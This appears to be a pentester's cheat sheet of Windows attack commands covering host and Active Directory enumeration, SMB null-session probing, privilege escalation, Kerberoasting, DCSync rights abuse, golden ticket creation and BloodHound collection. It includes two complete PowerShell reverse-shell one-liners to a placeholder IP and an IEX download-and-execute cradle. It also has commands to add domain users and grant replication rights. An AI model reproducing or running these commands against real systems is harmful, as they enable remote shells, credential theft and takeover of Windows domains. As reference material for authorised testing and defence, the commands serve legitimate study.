Windows snippets and commands

Snippets and commands for Windows pentesting.


tasklist /svc # enumerate processes and associated services
ipconfig /all
route print # routing table info
netstat -ano
netsh advfirewall show currentprofile # get firewall status and policy
schtasks /query /fo LIST /v # list scheduled tasks
wmic product get name, version, vendor # enumerate applications
accesschk.exe -uws 'Everyone' 'C:\' # list perms recursively for all users
net group "<group_name>" # check if group exists
setspn -T medin -Q */* # list existing SPNs

# check for null and guest access on smb services
enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>
smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>
smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //

nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP> # enumerate LDAP


# one-liner powershell reverse shell
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

# another reverse shell that seems more reliable
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',4444);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"

# URL encoded one-liner for web shells

# add user
net user <username> <password> /add /domain 

# add user to group
net group "<group_name>" /add <username>

# authenticate to samba
smbclient -U <user> //<ip>/<share>

Privilege escalation

# if AlwaysInstallElevated is set to 1 with those commands, we can privesc with a custom installer
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer

# generate a .msi payload with msfvenom, download it on the target then run
msiexec /quiet /qn /i C:\<your_path>\setup.msi

# powershell only, search objects that can be modified by everyone group
Get-ChildItem "C:\<path_here>" -Recurse | Get-Acl | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

# powershell only, search users with a SPN (service principal name) for potential kerberoasting
import-module activedirectory
get-aduser -ldapfilter "(serviceprincipalname=*)"

# grab the hash on attack box for kerberoasting
impacket-GetUserSPNs <domain_name>/<user>:<password> -request

# enable DCSync rights on user
Import-Module .\PowerView.ps1 # upload it first
Add-DomainObjectAcl -PrincipalIdentity <user> -TargetIdentity "DC=<domain>,DC=<local>" -Rights DCSync


# create a golden ticket
lsadump::lsa /inject /name:krbtgt

Take note of the info and:

# Use the info to complete the following command
kerberos::golden /user: /domain: /sid: /krbtgt: /id:


# set up bloodhound on target and attack box
sudo neo4j console # browse address in output and login
git clone https://github.com/BloodHoundAD/BloodHound.git # frequently updated so better fetch the last version
cd BloodHound && find . | grep exe$ # find the exe and copy it on target

# download the bloodhound release on github, unzip it then run it
./BloodHound --use-gl=egl # flag needed for X11 forwarding

# run sharphound on target
.\SharpHound.exe -c all # download the zip and pick it with "upload data" in the GUI

Useful commands

# set ANSI color bit for windows (useful for winpeas)
REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

# download with powershell
IEX(New-Object Net.WebClient).downloadString('<address>') # download and execute
wget http://<address:port>/<file> -Outfile file.exe # just download

# add modules
Import-Module .\<filename>.ps1
. ($PSScriptRoot + ".\<filename>.ps1") # alternative syntax